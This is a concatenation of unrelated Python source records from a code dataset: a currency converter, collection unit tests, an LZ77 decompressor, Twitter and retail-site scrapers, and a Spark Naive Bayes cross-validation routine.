currency_id=currency_quotation.currency_id,\n exchange_rate=currency_quotation.exchange_rate,\n date=currency_quotation.date)\n\n def delete_currency_quotation_by_id(self, currency_id: int, quotation_id: int) -> None:\n return self._repository.delete_by_id(currency_id, quotation_id)\n\n def convert_currency(self, converter: ConverterIn) -> ConverterOut:\n try:\n quotation_from = self._repository.get_by_id_and_date(converter.currency_id_from, converter.date)\n except NotFoundError:\n raise Exception('QuotationFrom not found in the database')\n\n quotation_from = CurrencyQuotationOut(id=quotation_from.id,\n currency_id=quotation_from.currency_id,\n exchange_rate=quotation_from.exchange_rate,\n date=quotation_from.date)\n\n try:\n quotation_to = 
self._repository.get_by_id_and_date(converter.currency_id_to, converter.date)\n except NotFoundError:\n raise Exception('QuotationTo not found in the database')\n\n quotation_to = CurrencyQuotationOut(id=quotation_to.id,\n currency_id=quotation_to.currency_id,\n exchange_rate=quotation_to.exchange_rate,\n date=quotation_to.date)\n\n value = converter.value * quotation_from.exchange_rate / quotation_to.exchange_rate\n\n return ConverterOut(CurrencyQuotationFrom=quotation_from, CurrencyQuotationTo=quotation_to,\n value=value)\n","sub_path":"currency-converter/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"325850689","text":"import json \n\nconfig = {}\nconfig[\"batch_size\"] = 24 \nconfig[\"seq_length\"] = 512\nconfig[\"is_training\"] = True\nconfig[\"use_input_mask\"] = True\nconfig[\"use_token_type_ids\"] = True\nconfig[\"vocab_size\"] = 103\nconfig[\"hidden_size\"] = 768\nconfig[\"num_hidden_layers\"] = 12\nconfig[\"num_attention_heads\"] = 12\nconfig[\"intermediate_size\"] =3072\nconfig[\"hidden_act\"] = \"gelu\"\nconfig[\"hidden_dropout_prob\"] = 0.1\nconfig[\"attention_probs_dropout_prob\"] =0.1\nconfig[\"max_position_embeddings\"] = 512\nconfig[\"type_vocab_size\"] = 2\nconfig[\"intializer_range\"] = 0.02\nconfig[\"scope\"] = None\n\njson.dump(config,open(\"./config.json\",\"w\"))","sub_path":"generate_json.py","file_name":"generate_json.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"461391452","text":"#!/usr/bin/env python\n\nfrom pytest import raises\n\nfrom gnome.movers.simple_mover import SimpleMover\nfrom gnome.movers import Mover, RandomMover\n\nfrom gnome.utilities.orderedcollection import OrderedCollection\n\n\nclass TestOrderedCollection(object):\n\n def test_init(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n assert oc.dtype == int\n oc = OrderedCollection([1, 2, 3, 4, 5], int)\n assert oc.dtype == int\n oc = OrderedCollection(dtype=int)\n assert oc.dtype == int\n\n with raises(TypeError):\n\n # either a populated list or a dtype is required\n\n oc = OrderedCollection()\n\n with raises(TypeError):\n oc = OrderedCollection('not a list')\n\n with raises(TypeError):\n\n # either a populated list or a dtype is required\n\n oc = OrderedCollection([])\n\n with raises(TypeError):\n oc = OrderedCollection([1, 2, 3, 4, 5], float)\n\n def test_len(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n assert len(oc) == 5\n\n def test_iter(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n assert [i for i in oc] == [1, 2, 3, 4, 5]\n\n def test_contains(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n assert id(5) in oc\n\n def test_getitem(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n assert oc[id(3)] == 3\n with raises(KeyError):\n oc[id(6)]\n\n def test_setitem(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n oc[id(6)] = 6\n assert [i for i in oc] == [\n 1,\n 2,\n 3,\n 4,\n 5,\n 6,\n ]\n oc[id(4)] = 7\n assert [i for i in oc] == [\n 1,\n 2,\n 3,\n 7,\n 5,\n 6,\n ]\n\n def test_delitem(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n with raises(KeyError):\n del oc[id(6)]\n del oc[id(4)]\n assert [i for i in oc] == [1, 2, 3, 5]\n\n def test_iadd(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n oc += 6\n assert [i for i in oc] == [\n 1,\n 2,\n 3,\n 4,\n 5,\n 6,\n ]\n oc += [7, 8, 9]\n assert [i for i in oc] == [\n 1,\n 2,\n 3,\n 4,\n 
5,\n 6,\n 7,\n 8,\n 9,\n ]\n\n def test_add(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n oc.add(6)\n assert [i for i in oc] == [\n 1,\n 2,\n 3,\n 4,\n 5,\n 6,\n ]\n with raises(TypeError):\n oc.add('not an int')\n\n def test_remove(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n with raises(KeyError):\n oc.remove(id(6))\n oc.remove(id(4))\n assert [i for i in oc] == [1, 2, 3, 5]\n\n def test_replace(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n oc.replace(id(6), 6)\n assert [i for i in oc] == [\n 1,\n 2,\n 3,\n 4,\n 5,\n 6,\n ]\n oc.replace(id(4), 7)\n assert [i for i in oc] == [\n 1,\n 2,\n 3,\n 7,\n 5,\n 6,\n ]\n assert oc[id(7)] == 7\n with raises(KeyError):\n\n # our key should also be gone after the delete\n\n oc[id(4)]\n with raises(TypeError):\n oc.replace(id(7), 'not an int')\n\n def test_index(self):\n oc = OrderedCollection([1, 2, 3, 4, 5])\n assert oc.index(id(3)) == 2\n oc[id(3)] = 6\n assert oc.index(id(6)) == 2\n del oc[id(6)]\n assert oc.index(id(4)) == 2\n\n def test_with_movers(self):\n mover_1 = SimpleMover(velocity=(1.0, -1.0, 0.0))\n mover_2 = SimpleMover(velocity=(1.0, -1.0, 0.0))\n mover_3 = SimpleMover(velocity=(1.0, -1.0, 0.0))\n mover_4 = SimpleMover(velocity=(1.0, -1.0, 0.0))\n\n # test our init, iter, get, and len methods\n\n mymovers = OrderedCollection([mover_1, mover_2], dtype=Mover)\n assert [m for m in mymovers] == [mover_1, mover_2]\n assert mymovers[mover_1.id] == mover_1\n assert len(mymovers) == 2\n\n # test our add methods\n\n mymovers = OrderedCollection(dtype=Mover)\n mymovers += mover_1\n mymovers += mover_2\n assert [m for m in mymovers] == [mover_1, mover_2]\n\n mymovers = OrderedCollection(dtype=Mover)\n mymovers += [mover_1, mover_2]\n assert [m for m in mymovers] == [mover_1, mover_2]\n\n # test our del method\n\n mymovers = OrderedCollection([mover_1, mover_2, mover_3],\n dtype=Mover)\n del mymovers[mover_2.id]\n assert [m for m in mymovers] == [mover_1, mover_3]\n\n # test our replace method\n\n mymovers = OrderedCollection([mover_1, mover_2, mover_3],\n dtype=Mover)\n mymovers[mover_2.id] = mover_4\n assert [m for m in mymovers] == [mover_1, mover_4, mover_3]\n assert mymovers[mover_4.id] == mover_4\n\n def test_eq(self):\n 'Test comparison operator __eq__'\n\n assert OrderedCollection([1, 2, 3, 4, 5]) \\\n == OrderedCollection([1, 2, 3, 4, 5])\n\n def test_ne(self):\n 'Test comparison operator (not equal)'\n\n assert OrderedCollection([1, 2, 3, 4, 5]) \\\n != OrderedCollection([2, 1, 3, 4, 5])\n assert OrderedCollection([1, 2, 3, 4, 5]) \\\n != OrderedCollection([1, 2, 3, 4])\n assert OrderedCollection([1, 2, 3, 4, 5]) != [1, 2, 3, 4, 5]\n\n def test_to_dict(self):\n 'added a to_dict() method - test this method'\n\n items = [SimpleMover(velocity=(i * 0.5, -1.0, 0.0)) for i in\n range(2)]\n items.extend([RandomMover() for i in range(2)])\n mymovers = OrderedCollection(items, dtype=Mover)\n dict_ = mymovers.to_dict()\n\n assert dict_['dtype'] == mymovers.dtype\n for (i, mv) in enumerate(items):\n assert dict_['items'][i][0] \\\n == '{0}.{1}'.format(mv.__module__, mv.__class__.__name__)\n assert dict_['items'][i][1] == i\n\n def test_int_to_dict(self):\n '''added a to_dict() method - test this method for int dtype.\n Tests the try, except is working correctly'''\n items = range(5)\n oc = OrderedCollection(items)\n dict_ = oc.to_dict()\n\n assert dict_['dtype'] == int\n for (i, item) in enumerate(items):\n assert dict_['items'][i][0] \\\n == '{0}'.format(item.__class__.__name__)\n assert dict_['items'][i][1] == i\n\n\nclass 
ObjToAdd:\n    'Define a helper class (mutable object) for use in TestCallbacks'\n    def __init__(self):\n        self.reset()\n\n    def reset(self):\n        self.add_callback = False\n        self.rm_callback = False\n        self.replace_callback = False\n\n\nclass TestCallbacks:\n\n    to_add = [ObjToAdd(), ObjToAdd(), ObjToAdd()]\n\n    def test_add_callback(self):\n        '''\n        test add callback is invoked after adding an object or\n        list of objects\n        '''\n\n        # lets work with a mutable type\n\n        oc = OrderedCollection(dtype=ObjToAdd)\n        oc.register_callback(self._add_callback, events='add')\n\n        # check everything if False initially\n\n        self._reset_ObjToAdd_init_state()\n\n        oc += self.to_add\n        oc += ObjToAdd()\n\n        for obj in oc:\n            assert obj.add_callback\n            assert not obj.rm_callback\n            assert not obj.replace_callback\n\n    def test_remove_callback(self):\n        'test remove callback is invoked after removing an object'\n\n        oc = OrderedCollection(dtype=ObjToAdd)  # lets work with a mutable type\n        oc.register_callback(self._rm_callback, events='remove')\n        oc.register_callback(self._add_callback, events='add')\n\n        # check everything if False initially\n\n        self._reset_ObjToAdd_init_state()\n\n        oc += self.to_add\n\n        del oc[id(self.to_add[0])]\n\n        assert self.to_add[0].rm_callback\n        assert self.to_add[0].add_callback\n        assert not self.to_add[0].replace_callback\n\n        self.to_add[0].reset()  # reset all to false\n        oc += self.to_add[0]  # let's add this back in\n\n        for obj in oc:\n            assert obj.add_callback\n            assert not obj.rm_callback\n            assert not obj.replace_callback\n\n    def test_replace_callback(self):\n        'test replace callback is invoked after replacing an object'\n\n        # lets work with a mutable type\n\n        oc = OrderedCollection(dtype=ObjToAdd)\n        oc.register_callback(self._replace_callback, events='replace')\n\n        # check everything if False initially\n\n        self._reset_ObjToAdd_init_state()\n\n        oc += self.to_add\n        rep = ObjToAdd()\n        oc[id(self.to_add[0])] = rep\n\n        for obj in oc:\n            assert not obj.add_callback\n            assert not obj.rm_callback\n            if id(obj) == id(rep):\n                assert obj.replace_callback\n            else:\n                assert not obj.replace_callback\n\n    def test_add_replace_callback(self):\n        'register one callback with multiple events (add, replace)'\n\n        # lets work with a mutable type\n\n        oc = OrderedCollection(dtype=ObjToAdd)\n        oc.register_callback(self._add_callback, events=('add',\n                                                         'replace'))\n\n        # check everything if False initially\n\n        self._reset_ObjToAdd_init_state()\n\n        oc += self.to_add\n\n        for obj in oc:\n            assert obj.add_callback\n            assert not obj.rm_callback\n            assert not obj.replace_callback\n\n        rep = ObjToAdd()\n        oc[id(self.to_add[0])] = rep\n\n        for obj in oc:\n            assert obj.add_callback\n            assert not obj.rm_callback\n            assert not obj.replace_callback\n\n    def _add_callback(self, obj_):\n        obj_.add_callback = True\n\n    def _rm_callback(self, obj_):\n        obj_.rm_callback = True\n\n    def _replace_callback(self, obj_):\n        obj_.replace_callback = True\n\n    def _reset_ObjToAdd_init_state(self):\n        for obj in self.to_add:\n            obj.reset()\n","sub_path":"py_gnome/tests/unit_tests/test_utilities/test_ordered_collection.py","file_name":"test_ordered_collection.py","file_ext":"py","file_size_in_byte":10346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"534964402","text":"#!/usr/bin/python\r\n# coding: utf-8\r\n\r\nu\"\"\" LZ77 decompressor by ideal.exe\r\n\r\n    A module for searching for and decompressing LZ77-compressed data.\r\n    Pass a file name and the start address of the compressed data to run it and decompress.\r\n\"\"\"\r\n\r\n\r\nimport os\r\nimport re\r\nimport struct\r\nimport sys\r\nimport time\r\n\r\n\r\ndef detectLZ77(romData):\r\n    u\"\"\"\r\n    Search for data that looks LZ77(0x10)-compressed\r\n\r\n    \"\"\"\r\n\r\n    minSize = 0x100 # bytes\r\n    maxSize = 0x10000\r\n    searchStep = 0x4\r\n\r\n    matchList = []\r\n    candidateIter = re.finditer(\"\\x10(?P<size>...)\\x00\\x00(?P=size)\", romData) # LZ77-compressed data starts with 10 XX YY ZZ 00 00 XX YY ZZ\r\n    for match in candidateIter:\r\n        matchAddr = match.start()\r\n        uncompSize = struct.unpack('l', romData[matchAddr+1 : matchAddr+4] + \"\\x00\")[0] # the next 3 bytes are the decompressed size (\"\\x00\" is appended because unpack needs 4 bytes)\r\n        # extract matches that sit at a nicely aligned position and have a plausible size\r\n        if (matchAddr >= 0x600000 and matchAddr % searchStep == 0 and minSize <= uncompSize <= maxSize):\r\n            print( hex(matchAddr) + \"\\t\" + str(uncompSize) + \" Bytes\" )\r\n            matchList.append( {\"startAddr\":matchAddr, \"uncompSize\":uncompSize} )\r\n\r\n    return matchList\r\n\r\n\r\ndef decompLZ77_10(data, startAddr):\r\n    u\"\"\"\r\n    Decode LZ77(0x10)-compressed data\r\n    Reference: http://florian.nouwt.com/wiki/index.php/LZ77_(Compression_Format)\r\n\r\n    \"\"\"\r\n\r\n    uncompSize = int.from_bytes(data[startAddr+1:startAddr+4], \"little\")\r\n\r\n    def ascii2bit(a):\r\n        u\"\"\"\r\n        Convert an ASCII string to a binary string (8 digits per character)\r\n        * currently unused\r\n        \"\"\"\r\n\r\n        b = \"\"\r\n        for c in list(a): # for each character of the ASCII string\r\n            b += bin( struct.unpack(\"B\", c)[0] )[2:].zfill(8)\r\n        return b\r\n\r\n    def byte2bit(byte):\r\n        u\"\"\" Convert a byte sequence to a binary string (8 digits per byte)\r\n        \"\"\"\r\n\r\n        bit = \"\"\r\n\r\n        if isinstance(byte, int):\r\n            bit = bin(byte)[2:].zfill(8)\r\n        else:\r\n            for b in byte:\r\n                bit += bin(b)[2:].zfill(8)\r\n        return bit\r\n\r\n    output = b\"\" # byte string that stores the decoded result\r\n    writePos = 0 # write position in the decoded data\r\n    readPos = startAddr+4 # read start position in the compressed data\r\n\r\n    while len(output) < uncompSize:\r\n        currentChar = data[readPos] # read the block header (1 byte)\r\n        blockHeader = byte2bit(currentChar) # convert the block header to a binary string\r\n        for i in range(8): # one set is 8 blocks\r\n            if blockHeader[i] == str(0):\r\n                u\"\"\"\r\n                Handling of an uncompressed block\r\n\r\n                \"\"\"\r\n                readPos += 1 # move to the next read position\r\n                if readPos >= len(data): # this check is a bit ad hoc\r\n                    break\r\n                currentChar = data[readPos:readPos+1] # read 1 byte (data[readPos] would give an int, not bytes)\r\n                output += currentChar # output as-is\r\n                writePos += 1 # move to the next write position\r\n            else:\r\n                u\"\"\"\r\n                Handling of a compressed block\r\n\r\n                \"\"\"\r\n                readPos += 2\r\n                blockData = data[readPos-1:readPos+1] # read 2 bytes as block info\r\n                blockData = byte2bit(blockData) # convert the block info to a binary string\r\n                #print \"Block Data: \" + blockData\r\n\r\n                offs = int(blockData[4:16], 2) + 1\r\n                #print \"Backwards Offset: \" + str(offs) + \" bytes\"\r\n\r\n                leng = int(blockData[0:4], 2) + 3\r\n                #print \"Copy Length: \" + str(leng) + \" bytes\"\r\n                currentChar = output[writePos - offs : writePos - offs + leng]\r\n                if len(currentChar) < leng: # this is where it got stuck\r\n                    #print \"Block Data: \" + blockData\r\n                    #print \"Backwards Offset: \" + str(offs) + \" bytes\"\r\n                    #print \"Copy Length: \" + str(leng) + \" bytes\"\r\n                    # when copying beyond the existing range, the preceding pattern is repeated\r\n                    #currentChar = \"{0:{s}<{N}}\".format(currentChar, s=currentChar[0], N = leng)\r\n                    currentChar = currentChar * leng # somewhat ad hoc\r\n                    currentChar = currentChar[0:leng]\r\n                    #print binascii.hexlify(currentChar)\r\n                    #print currentChar\r\n                #print binascii.hexlify(currentChar)\r\n                output += currentChar\r\n                writePos += leng # advance by the number of bytes written\r\n                readPos += 1\r\n\r\n    output = output[0:uncompSize] # cut out only the needed part\r\n    return output\r\n\r\ndef saveFile(data, outName):\r\n    u\"\"\" Write data to a file\r\n    \"\"\"\r\n\r\n    try:\r\n        with open(outName, \"wb\") as outFile:\r\n            outFile.write(data)\r\n    except:\r\n        print(u\"Could not write the file correctly\")\r\n\r\n\r\ndef main():\r\n    startTime = time.time() # start measuring the execution time\r\n\r\n    # Not enough arguments!\r\n    if len(sys.argv) < 3:\r\n        print(u\"Not enough arguments\")\r\n        sys.exit()\r\n\r\n    filePath = sys.argv[1] # store the first argument as the file path\r\n    startAddr = int(sys.argv[2], 16)\r\n    name, ext = os.path.splitext(filePath) # get the file name and the extension\r\n    outName = name + \"_\" + hex(startAddr) + \".bin\" # output file name\r\n\r\n    # open the file\r\n    try:\r\n        with open(filePath, 'rb') as romFile: # open as a read-only binary file\r\n            romData = romFile.read() # binary string of the data (like the ASCII pane of a hex editor)\r\n            size = len(romData) # file size\r\n            print( str(size) + \" Bytes\" )\r\n    except:\r\n        print(u\"Could not open the file\")\r\n\r\n    output = decompLZ77_10(romData, startAddr)\r\n    saveFile(output, outName)\r\n\r\n\r\n    executionTime = time.time() - startTime # stop measuring the execution time\r\n    print( \"Execution Time:\\t\" + str(executionTime) + \" sec\" )\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","sub_path":"common/LZ77Util.py","file_name":"LZ77Util.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"125448121","text":"import tweepy\nimport csv\nfrom tokens import consumer_key, consumer_secret, access_token, access_token_secret\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth,wait_on_rate_limit=True)\n# Open/Create a file to append data\ncsvFile = open('./mydata/test.csv', 'a')\n# Use csv Writer\ncsvWriter = csv.writer(csvFile)\n\nfor tweet in tweepy.Cursor(api.search,q=\"#Pfizer\",count=100,\n                           lang=\"en\",\n                           since=\"2021-05-11\",tweet_mode='extended').items():\n    csvWriter.writerow([tweet.full_text.encode('utf-8'),tweet.retweet_count,tweet.user.followers_count,tweet.favorite_count,tweet.place,tweet.coordinates,tweet.geo,tweet.created_at])\nprint('Done!')","sub_path":"twitter_extract.py","file_name":"twitter_extract.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"534063950","text":"import bs4\r\nimport re\r\nfrom lxml import etree\r\n\r\nfrom remote import request\r\nfrom api import deactivate, save, save_img, get_event_list\r\nfrom citilink import conf\r\n\r\n\r\ndef parse_category(url_category, replace_category, exists_goods):\r\n    def check(_res):\r\n        return bool(re.search('pageData = ', _res.text))\r\n\r\n    cookies = _set_city()\r\n    page = 1\r\n    while True:\r\n        url = 'http://www.citilink.ru/catalog/{category_p}?p={page_p}'\r\n        res = request(\r\n            url.format(category_p=url_category, page_p=page),\r\n            id_client=conf.id_client,\r\n            check_function=check,\r\n            cookies=cookies,\r\n            encoding=conf.encoding\r\n        )\r\n        if not res:\r\n            return None\r\n\r\n        bsoup = bs4.BeautifulSoup(res.text, 'html5lib')\r\n        sub_category_list = bsoup.select('h2.category-content__title\" a')\r\n        if len(sub_category_list) > 0:\r\n            del bsoup\r\n\r\n            for sub_category in sub_category_list:\r\n                id_subcategory = re.search('catalog/(.+)$', sub_category['href'])\r\n                if id_subcategory is not None:\r\n                    parse_category(id_subcategory.group(1), replace_category, exists_goods)\r\n\r\n            return None\r\n\r\n        for good in bsoup.select('.prices .special'):\r\n            # calculate the discount percentage; if it is below 5, move on to the next item\r\n            old_price = good.find_parent('div', {\r\n                'class': 'prices'\r\n            }).select_one('.standart .num')\r\n            price = good.select_one('.num')\r\n            if old_price is None or price is None:\r\n                continue\r\n\r\n            percent = 100 - (int(price.text.replace(' ', '')) / (int(old_price.text.replace(' ', '')) / 100))\r\n            if round(percent) 
< 5:\r\n continue\r\n\r\n parent = good.find_parent('tbody', {\r\n 'class': 'product_data__gtm-js',\r\n })\r\n link = parent.select_one('.product_name a.link_gtm-js')\r\n id_good = re.search('/(\\d+)/$', link['href'])\r\n if id_good is None:\r\n continue\r\n\r\n data = {\r\n 'id_client': conf.id_client,\r\n 'id_category': replace_category[0],\r\n 'id_sub_category': replace_category[1],\r\n 'old_price': old_price.text.replace(' ', ''),\r\n 'current_price': price.text.replace(' ', ''),\r\n }\r\n if parse_good(id_good.group(1), data):\r\n exists_goods.append(id_good.group(1))\r\n\r\n next_page = bsoup.select_one('.page_listing li.next')\r\n if next_page is None:\r\n break\r\n\r\n page += 1\r\n\r\n\r\ndef parse_good(id_good, data):\r\n def check(_res):\r\n return bool(re.search('\"pageType\":\"ProductPage\"', _res.text))\r\n\r\n cookies = _set_city()\r\n url = 'http://www.citilink.ru/catalog/{id_p}/'.format(id_p=id_good)\r\n res = request(\r\n url,\r\n id_client=conf.id_client,\r\n check_function=check,\r\n cookies=cookies,\r\n encoding=conf.encoding\r\n )\r\n if not res:\r\n return None\r\n\r\n avail = re.search('\"productAvailability\":\"available\"', res.text)\r\n if avail is None:\r\n return None\r\n\r\n bsoup = bs4.BeautifulSoup(res.text, 'html5lib')\r\n\r\n data['link'] = url\r\n data['name'] = list(bsoup.select_one('.product_header h1').stripped_strings)[1]\r\n data['description'] = bsoup.select_one('.short_description').getText(strip=True)\r\n\r\n save_res = save(data)\r\n if not save_res:\r\n return None\r\n\r\n img_count = 0\r\n for photo in bsoup.select('.image_gallery li.photo_carousel__js a'):\r\n if img_count > 4:\r\n break\r\n\r\n img = request(photo['href'], stream=True, use_proxy=False)\r\n if not img:\r\n continue\r\n img_count += 1\r\n\r\n import tempfile\r\n with tempfile.NamedTemporaryFile() as f:\r\n for chunk in img.iter_content(1024):\r\n f.write(chunk)\r\n\r\n f.seek(0, 0)\r\n save_img(conf.id_client, img_count, save_res['response']['id_event'], f)\r\n\r\n return True\r\n\r\n\r\ndef check_activity(id_good):\r\n def check(_res):\r\n return bool(re.search('\"pageType\":\"ProductPage\"', _res.text))\r\n\r\n cookies = _set_city()\r\n res = request(\r\n 'http://www.citilink.ru/catalog/{id_p}/'.format(id_p=id_good),\r\n id_client=conf.id_client,\r\n check_function=check,\r\n cookies=cookies,\r\n encoding=conf.encoding\r\n )\r\n if not res:\r\n return None\r\n\r\n avail = re.search('\"productAvailability\":\"available\"', res.text)\r\n price = re.search('line-block club_price', res.text)\r\n if avail is None or price is None:\r\n return False\r\n\r\n html = etree.HTML(res.text)\r\n price = html.xpath(\"//div[@class='line-block club_price']//div[@class='price_block']//ins[@class='num']\")\r\n old_price = html.xpath(\"//div[contains(@class, 'standart_price')]/span[@class='price']/ins[@class='num']\")\r\n if len(price) > 0 and len(old_price) > 0:\r\n percent = 100 - (int(price[0].text.replace(' ', '')) / (int(old_price[0].text.replace(' ', '')) / 100))\r\n return round(percent) >= 5\r\n\r\n return False\r\n\r\n\r\ndef research():\r\n exists_goods = []\r\n\r\n # Полчим список всех существующих акций текущего сайта\r\n event_list = get_event_list(conf.id_client, conf.domain)\r\n if event_list is not None:\r\n for event in event_list['response']['events']:\r\n id_good = re.search('/(\\d+)/$', event['link'])\r\n is_active = check_activity(id_good.group(1))\r\n if is_active is not None and is_active:\r\n exists_goods.append(id_good.group(1))\r\n\r\n elif is_active is not None and not 
is_active:\r\n deactivate(conf.id_client, event['id'])\r\n\r\n return exists_goods\r\n\r\n\r\ndef start():\r\n exists_goods = research()\r\n\r\n for id_category in conf.category_replace:\r\n if id_category is not None and conf.category_replace[id_category] is not None:\r\n parse_category(id_category, conf.category_replace[id_category], exists_goods)\r\n\r\n\r\ndef _set_city():\r\n return {\r\n '_space': conf.id_city,\r\n }\r\n","sub_path":"robots/parser/citilink/grabber.py","file_name":"grabber.py","file_ext":"py","file_size_in_byte":6272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"186844872","text":"def CrossValidation(k):\n countexcess={}\n countunder={}\n #Split the training data into k folds(train is the complete training data)\n trainint=(train.coalesce(k,shuffle=True).glom().collect())\n newfolds=[]\n excess=[]\n nSamplesinfold=len(train)/k\n#This code snippet ensures that each fold contains equal number of examples(nSamplesinfold here)\n for i,val in enumerate(trainint):\n if len(val)-nSamplesinfold>0:\n countexcess[i]=len(val)-nSamplesinfold\n trainint[i]=val[countexcess[i]:]\n excess.append(val[:countexcess[i]+1])\n else:\n countunder[i]=nSamplesinfold-len(val)\n excess=list(itertools.chain(*excess))\n for key,value in countunder.items():\n ex=excess[:value]\n trainint[key].extend(ex)\n accuracy_nb_val=[]\n accuracy_nb_test=[]\n for i in range(0,k):\n print (\"Iteration no. {}\".format(i+1))\n#Ensures that one fold is used for validation and others are used for training(without replacement i.e one fold which was earlier \n#used for validation is never used again) \n val=trainint[i]\n train2=trainint[:i]\n train2.extend(trainint[i+1:])\n train21=list(itertools.chain(*train2))\n#form the training and validation data\n train=sc.parallelize(train21)\n validation=sc.parallelize(val)\n hashingTF = HashingTF()\n#Feature Extraction for training data\n tf_train = train.map(lambda tup: hashingTF.transform(tup[1]))\n idf_train = IDF().fit(tf_train)\n tfidf_train = idf_train.transform(tf_train)\n#feature Extraction for Validation Data\n tf_val = validation.map(lambda tup: hashingTF.transform(tup[1]))\n idf_val = IDF().fit(tf_val)\n tfidf_val = idf_train.transform(tf_val)\n#Feature Extraction for test data\n tf_test = test.map(lambda tup: hashingTF.transform(tup[1]))\n idf_test = IDF().fit(tf_test)\n tfidf_test = idf_test.transform(tf_test)\n#Labeled Data for training data\n labels=train.map(lambda x:x[0])\n transformeddata=labels.zip(tfidf_train)\n labeled1_train = transformeddata.map(lambda k: LabeledPoint(k[0], k[1]))\n#Labeled Data for validation data\n labelsval=validation.map(lambda x:x[0])\n transformedvaldata=labelsval.zip(tfidf_val)\n labeled1_val = transformedvaldata.map(lambda k: LabeledPoint(k[0], k[1]))\n#Labeled Data for Test Data\n labelstest=test.map(lambda x:x[0])\n transformeddatatest=labelstest.zip(tfidf_test)\n labeled1_test = transformeddatatest.map(lambda k: LabeledPoint(k[0], k[1]))\n model = NaiveBayes.train(labeled1_train, 1.0)\n predictionAndLabelval = labeled1_val.map(lambda p: (model.predict(p.features), p.label))\n accuracyval = 1.0 * predictionAndLabelval.filter(lambda x: x[0] == x[1]).count() / validation.count()\n print('model Validation accuracy for Naive Bayes{}'.format(accuracyval))\n accuracy_nb_val.append(accuracyval)\n predictionAndLabeltest = labeled1_test.map(lambda p: (model.predict(p.features), p.label))\n accuracytest = 1.0 * predictionAndLabeltest.filter(lambda x: x[0] == x[1]).count() / 
test.count()\n print('model test accuracy for Naive Bayes{}'.format(accuracytest))\n accuracy_nb_test.append(accuracytest)\n\n\n","sub_path":"crossvalidationcompletefornb.py","file_name":"crossvalidationcompletefornb.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"408735111","text":"from datetime import date\nfrom django.core.exceptions import ValidationError\nfrom django.test.testcases import TestCase\n\nfrom EC.tests.models import Test\nfrom ecweb.models import ClassRoom, Student, BasicUser\n\n\nclass TestModelTest(TestCase):\n def setUp(self):\n self.cr = ClassRoom.objects.create(number_class=1, level='Beginner', turn='morning',)\n\n u1 = BasicUser.objects.create_superuser(\n username='user',\n password='pass',\n email=\"user1@mail.com\"\n )\n\n u2 = BasicUser.objects.create_superuser(\n username='user',\n password='pass',\n email=\"user2@mail.com\"\n )\n\n s1 = Student.objects.create(user=u1, cod=1, type_of_course='1-month')\n s2 = Student.objects.create(user=u2, cod=2, type_of_course='1-month')\n\n self.obj = Test.objects.create(\n classroom=self.cr,\n date=date(2018, 1, 7),\n type=Test.LISTENING,\n )\n self.obj.attendances.add(s1)\n self.obj.attendances.add(s2)\n\n def test_create(self):\n self.assertTrue(Test.objects.exists())\n\n def test_str(self):\n obj_str = f'2018-01-07: {Test.LISTENING}'\n self.assertEqual(obj_str, str(self.obj))\n\n def test_choices(self):\n \"\"\"Test type should be limited to listening or reading\"\"\"\n test = Test(\n classroom=self.cr,\n date=date(2018, 1, 7),\n type='writing'\n )\n\n self.assertRaises(ValidationError, test.full_clean)\n\n def test_has_attendances(self):\n test = Test.objects.first()\n self.assertTrue(test.attendances.exists())","sub_path":"EC/tests/tests/test_model_test.py","file_name":"test_model_test.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"160772304","text":"class PpiData:\n def __init__(self, train_adj, val_adj, test_adj, train_feat, val_feat, test_feat, train_labels, val_labels,\n test_labels, train_nodes, val_nodes, test_nodes, tr_msk, vl_msk, ts_msk):\n self.train_adj = train_adj\n self.val_adj = val_adj\n self.test_adj = test_adj\n self.train_feat = train_feat\n self.val_feat = val_feat\n self.test_feat = test_feat\n self.train_labels = train_labels\n self.val_labels = val_labels\n self.test_labels = test_labels\n self.train_nodes = train_nodes\n self.val_nodes = val_nodes\n self.test_nodes = test_nodes\n self.tr_msk = tr_msk\n self.vl_msk = vl_msk\n self.ts_msk = ts_msk\n\n def to_device(self, device=None):\n raise NotImplementedError()\n\n def save(self, path='./data'):\n raise NotImplementedError()\n","sub_path":"utils/ppi_data.py","file_name":"ppi_data.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"553083885","text":"\nfrom manualcontrolmultitasks import ManualControlMulti\nfrom riglib.stereo_opengl.window import WindowDispl2D\n#from bmimultitasks import BMIControlMulti\nimport pygame\nimport numpy as np\nimport copy\n\n#from riglib.bmi.extractor import DummyExtractor\n#from riglib.bmi.state_space_models import StateSpaceEndptVel2D\n#from riglib.bmi.bmi import Decoder, BMISystem, GaussianStateHMM, BMILoop, GaussianState, MachineOnlyFilter\nfrom riglib import experiment\nfrom 